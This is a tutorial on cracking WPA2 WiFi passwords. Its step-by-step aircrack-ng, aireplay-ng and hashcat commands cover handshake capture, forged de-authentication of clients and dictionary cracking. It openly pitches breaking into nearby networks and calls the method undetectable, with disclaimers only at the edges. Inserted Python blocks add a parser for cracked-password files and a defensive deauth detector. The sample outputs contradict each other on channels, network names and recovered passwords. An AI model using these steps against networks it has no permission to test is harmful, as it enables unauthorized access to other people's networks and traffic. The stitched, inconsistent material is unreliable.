In this guide, we show how to crack WiFi networks that are secured with a weak password, using two of the best wireless hacking tools. We detail step by step how to hack WPA2 with aircrack-ng and hashcat, though the guide is not exhaustive. It gives users enough information to test their own network security or break into one that is nearby.
The attack outlined below is entirely passive and is impossible to detect, provided that you never use the cracked password. An optional de-authentication attack (which is active, and therefore can be detected) can be used to speed up the reconnaissance process; you can read more about it at the end of the guide.
If you already have some knowledge of this process, you do not need to read the descriptions; just jump to the list of commands at the bottom.
Note: Keep in mind that this tutorial is only for educational purposes and should not be used for any illegal activity. The author is not responsible for any kind of misuse.
The tools needed
- Make sure you are comfortable using the Linux command line.
- Make sure to either have Kali Linux or Kali NetHunter installed.
- Now make sure to have Aircrack-ng downloaded and installed.
- The last tool you need is hashcat.
- John the Ripper is a great alternative if hashcat does not work for you.
How to Crack WPA2 Passwords with Aircrack-ng and Hashcat (Tutorial)
Enable Monitor Mode in your WiFi Adapter
You need to begin by listing the wireless interfaces that support monitor mode with:
airmon-ng
If no interface is listed, your wireless card does not support monitor mode. We assume the wireless interface is named wlan0; be sure to use the correct name if yours differs. Next, place the interface in monitor mode:
airmon-ng start wlan0
After this, run iwconfig. You should now see a new monitor-mode interface listed, such as mon0 or wlan0mon.
Find your target
Start listening to the 802.11 beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
You are going to see the following output:
CH 13 ][ Elapsed: 52 s ][ 2022-01-02 17:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK securedyou
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK securedyou
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou is the best
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
We are going to crack the password of the network named securedyou. Note the BSSID (MAC address) and the channel (CH) number displayed by airodump-ng, as both are required for the next step.
How to Capture a 4-way Handshake in WiFi Networks
WPA and WPA2 use a 4-way handshake to authenticate devices to the network. You do not need to know the details, but you need to capture one of these handshakes to crack the network password. A handshake takes place whenever a device connects to the network, for example when your neighbours come home. We capture it by directing airodump-ng to monitor traffic on the target network, using the channel and BSSID values obtained from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2020-03-07 13:09:16 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK DELL
Once you have captured the handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 ] in the top right of the screen, just to the right of the current time.
If you are impatient and comfortable with using an active attack, you can force devices connected to the target network to reconnect by sending malicious de-authentication packets to them. This results in the capture of a 4-way handshake.
Once the handshake has been captured, press ctrl-c to quit airodump-ng. You will see a .cap file named -01.cap in the directory where you told airodump-ng to save the capture. We will use this capture file to crack the network password. Rename the file to reflect the network name we are trying to crack:
mv ./-01.cap securedyou.cap
The Real Fun: Cracking the WPA2 Password
The last step is to crack the password using the captured handshake. If you have access to a GPU, it is highly recommended to use hashcat for password cracking. We have created a tool that makes hashcat very easy to use, known as naive-hashcat.
If you do not have access to a GPU, there are many GPU cracking services you can use, such as GPUHASH.me or OnlineHashCrack. You can also do CPU cracking with aircrack-ng. If you want to save time and get the most out of your GPU, you can overclock it to speed up the brute-forcing.
Keep in mind that both of the methods below assume a weak, user-generated password. Many WPA/WPA2 routers ship with a strong 12-character random password that most users leave unchanged. If you want to attempt one of these passwords, we recommend the WPA-length dictionary files from Probable-Wordlists.
Using Naive-Hashcat to do the Magic
Before cracking the password with naive-hashcat, you need to convert the .cap file to the equivalent hashcat file format, .hccapx. This can be done quickly either by uploading the .cap file to https://hashcat.net/cap2hccapx or by using the cap2hccapx tool directly.
Then download naive-hashcat and run it:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
Download a wordlist or large dictionary file:
Passwords Wordlist for Cracking WPA2 WiFi Passwords
Set the hashcat mode for WPA/WPA2 and run the cracker:
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=securedyou.hccapx POT_FILE=securedyou.pot HASH_TYPE=2500 ./naive-hashcat.sh
naive-hashcat uses several attack types (dictionary, rule, combination and mask) and can take almost 10 days to run against a mid-strength password. The cracked password is written to the POT_FILE (securedyou.pot in the command above), so check this file periodically. Once the password has been cracked, the content of your POT_FILE will look something like this:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:securedyouhacking
The last two fields, separated by ':', are the network name and the password respectively.
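To read the POT_FILE reliably, here is an added parser (not part of the tutorial or of naive-hashcat) for the line layout shown above: it splits on at most four ':' from the left so that a cracked password containing ':' is kept intact, and validates the hash and MAC fields. The sample lines are constructed.

```python
import re

HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample potfile lines in the layout shown above: four ':'-separated
# fields (hash, AP MAC, station MAC, ESSID) followed by the password.
SAMPLE_POT = """\
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:securedyouhacking
0123456789abcdef0123456789abcdef:9c5c8ec9abc0:64bc0c4897f7:HomeNet:pass:with:colons
not a pot line
"""


def mac(hex12):
    """Render a 12-hex-digit MAC as colon-separated octets."""
    return ":".join(hex12[i:i + 2] for i in range(0, 12, 2)).lower()


def parse_pot(text):
    """Parse potfile lines into dicts; return (entries, rejected_lines).

    Splitting on at most four ':' from the left keeps a password that itself
    contains ':' whole. An ESSID containing ':' would still be ambiguous,
    which is why the fixed-width hash and MAC fields are validated rather
    than trusted."""
    entries, rejected = [], []
    for line in text.splitlines():
        parts = line.split(":", 4)
        if len(parts) != 5:
            rejected.append(line)
            continue
        h, ap, sta, essid, pw = parts
        fields_ok = (len(h) == 32 and HEX.match(h)
                     and len(ap) == 12 and HEX.match(ap)
                     and len(sta) == 12 and HEX.match(sta))
        if not fields_ok:
            rejected.append(line)
            continue
        entries.append({"ap": mac(ap), "station": mac(sta),
                        "essid": essid, "password": pw})
    return entries, rejected


if __name__ == "__main__":
    found, bad = parse_pot(SAMPLE_POT)
    for e in found:
        print(f"{e['essid']} ({e['ap']}): {e['password']}")
    print(f"{len(bad)} line(s) rejected")
```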
Using Aircrack-ng to perform Dictionary Attack
aircrack-ng can also be used for basic dictionary attacks that run on your CPU. Before running the attack, you need a wordlist. We recommend the infamous RockYou dictionary file.
Download RockYou Dictionary Wordlist File
Keep in mind that if the network password is not in the wordlist, then you shall not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the word file
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt securedyou.cap
If the password is cracked, you will see a KEY FOUND! message in the terminal, followed by the plain-text network password.
Aircrack-ng 2.0
[00:01:49] 111040 keys tested (102.73 k/s)
KEY FOUND! [ SecuredYou-test-environment ]
Master Key    : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
                59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
                2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
                6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
                8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC    : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Performing the De-authentication Attack
The de-authentication attack sends forged de-authentication packets from your machine to a client connected to the network you are trying to crack. The packets carry a spoofed sender address, so they appear to the client as if they were sent by the access point itself. On receiving such packets, many clients will disconnect from the network and immediately reconnect, providing a 4-way handshake if you are listening with airodump-ng.
Use airodump-ng to monitor the specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client looks like this, where 64:BC:0C:48:97:F7 is the client MAC.
CH 7 ][ Elapsed: 4 mins ][ 2020-03-08 20:24 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 Dell
Leave airodump-ng running and open a new terminal. We use the aireplay-ng command to send fake de-auth packets to the victim client, which forces it to reconnect to the network and, hopefully, produces a handshake in the process.
# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be, at the risk of noticeably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
You can also broadcast deauth packets to all clients connected to a wireless network with the command below:
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
After sending the deauth packets, switch back to the airodump-ng process; with any luck you will see something like [ WPA handshake: 9C:5C:8E:C9:AB:C0 ] in the top right. Now that the handshake has been captured, you are ready to crack the network password.
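For the defending side, here is an added example (not from the tutorial or the aircrack-ng project) of the detection logic a wireless IDS applies to the behaviour described above: it flags a burst of deauthentication or disassociation frames aimed at one client and records whether that client re-associated shortly afterwards, which is exactly the pattern that yields a fresh 4-way handshake. The frame records are constructed; a real deployment would decode them from a monitor-mode capture.

```python
from collections import defaultdict

# 802.11 management frame subtypes (frame control field, type 0).
ASSOC_REQ, BEACON, DISASSOC, DEAUTH = 0, 8, 10, 12

# Constructed sample of decoded management frames, not a real capture:
# (seconds, subtype, source MAC, destination MAC).
FRAMES = [
    (0.00, BEACON, "9c:5c:8e:c9:ab:c0", "ff:ff:ff:ff:ff:ff"),
    (0.20, DEAUTH, "9c:5c:8e:c9:ab:c0", "64:bc:0c:48:97:f7"),
    (0.21, DEAUTH, "9c:5c:8e:c9:ab:c0", "64:bc:0c:48:97:f7"),
    (0.22, DEAUTH, "9c:5c:8e:c9:ab:c0", "64:bc:0c:48:97:f7"),
    (0.90, ASSOC_REQ, "64:bc:0c:48:97:f7", "9c:5c:8e:c9:ab:c0"),
    (30.0, DEAUTH, "9c:5c:8e:c9:ab:c0", "ff:ff:ff:ff:ff:ff"),  # lone frame, below threshold
]


def deauth_bursts(frames, window_s=1.0, threshold=3, reassoc_s=10.0):
    """Return one alert per (AP, client) pair that received at least
    `threshold` deauth/disassoc frames inside a sliding `window_s` window.
    Each alert notes whether the client sent an association request within
    `reassoc_s` seconds after the burst (the forced-reconnect signature)."""
    kicks = defaultdict(list)   # (ap, client) -> times of deauth/disassoc frames
    assocs = defaultdict(list)  # (ap, client) -> times of association requests
    for t, subtype, src, dst in sorted(frames):
        if subtype in (DEAUTH, DISASSOC):
            kicks[(src, dst)].append(t)
        elif subtype == ASSOC_REQ:
            assocs[(dst, src)].append(t)
    alerts = []
    for pair, times in kicks.items():
        start = 0
        for end, t_end in enumerate(times):
            while t_end - times[start] > window_s:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                ap, client = pair
                reassoc = any(t_end < a <= t_end + reassoc_s for a in assocs[pair])
                alerts.append({"ap": ap, "client": client, "count": end - start + 1,
                               "first": times[start], "last": t_end,
                               "reassoc_followed": reassoc})
                break   # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for alert in deauth_bursts(FRAMES):
        print(alert)
```

Broadcast deauth frames (destination ff:ff:ff:ff:ff:ff) are counted against the broadcast address, so correlating them with a specific client's re-association needs a separate lookup that this example omits.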
Video Version of the tutorial
If you learn best by watching someone else do it, a video version is below.
Hacking WPA2 Wireless Passwords using Aircrack-ng/Hashcat
Alternative wireless hacking tools you could use:
- Kismet Free Download – WiFi Sniffer
- Reaver WPS Pin Cracker Download
- 15 Best Free Hacking Tools and Security Tools to Download.
Last Words
Disclaimer: This is just a simulation of how someone can crack WPA2 passwords using tools like Hashcat and Aircrack-ng. This kind of activity should only be performed in a controlled environment where permission is given. However, I do hope you enjoyed this comprehensive tutorial and have made the most out of it.